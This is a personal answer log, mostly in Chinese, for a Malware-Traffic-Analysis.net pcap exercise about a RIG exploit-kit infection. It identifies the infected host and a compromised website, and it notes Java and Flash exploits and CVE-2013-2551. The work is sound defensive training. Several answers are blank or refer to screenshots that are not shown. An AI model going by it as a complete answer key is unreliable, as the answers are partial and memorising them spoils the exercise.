Malware-Traffic-Analysis.net - 2014-11-16 - Traffic analysis exercise
並不是解題的思路歷程,而是答案證據記錄。
LEVEL 1 QUESTIONS:
What is the IP address of the Windows VM that gets infected?
根據經驗捕捉的流量有公私網地址,所以應該位於網關位置,所以受感染的 vm 應該爲私網地址,那麼很有可能就是以下地址。
根據通信數據大小來判斷,很有可能是 172.16.165.165 這臺。
此外,這些 ip 有的是主機,有的是 路由器/交換機,可以通過 nbns 協議進一步確認。nbns 協議特徵是主機向 路由器/交換機 發送消息。
因此,可以判斷 172.16.165.165 爲終端,其他兩個爲網絡設備。再排查一下 172.16.165.254
可以看到 172.16.165.254 爲 dhcp 服務器。
故可以確定 受陷主機爲 172.16.165.165
What is the host name of the Windows VM that gets infected?
What is the MAC address of the infected VM?
What is the IP address of the compromised web site?
將該頁面的響應導出後,直接報毒。所以就是 該網站被攻陷
What is the domain name of the compromised web site?
What is the IP address and domain name that delivered the exploit kit and malware?
繼續翻看請求記錄,發現請求了一個 jar 包。
下載下來後發現報毒。
所以就是通過 該網站來投遞攻擊載荷。
另一個方法就是把所有的 http 對象導出,然後用殺毒軟件掃一下整個導出目錄。。。
通過 referer 頭部定位到引用惡意域名的網站
LEVEL 2 QUESTIONS:
What is the redirect URL that points to the exploit kit (EK) landing page?
第一個請求 stand. 這個域名的http header referer 字段
Besided the landing page (which contains the CVE-2013-2551 IE exploit), what other exploit(s) sent by the EK?
java 和 flash
How many times was the payload delivered?
3 次,按照順序,分別是
Submit the pcap to VirusTotal and find out what snort alerts triggered. What are the EK names are shown in the Suricata alerts?
將流量包提交到 virustotal,觀察輸出即可
LEVEL 3 QUESTIONS:
Checking my website, what have I (and others) been calling this exploit kit?
這個我不會,,看答案是 RIG EK
What file or page from the compromised website has the malicious script with the URL for the redirect?
http://www.ciniholland.nl/ 該url 的響應包
這也發現 wireshark 的一處問題,沒有多個數據包data部分搜索功能。
其實可以將整個導出對象的文件夾添加到 vscode 中,再使用全局搜索功能
Extract the exploit file(s). What is(are) the md5 file hash(es)?
VirusTotal doesn't show all the VRT rules under the "Snort alerts" section for the pcap analysis. If you run your own version of Snort with the VRT ruleset as a registered user (or a subscriber), what VRT rules fire?
沒嘗試。。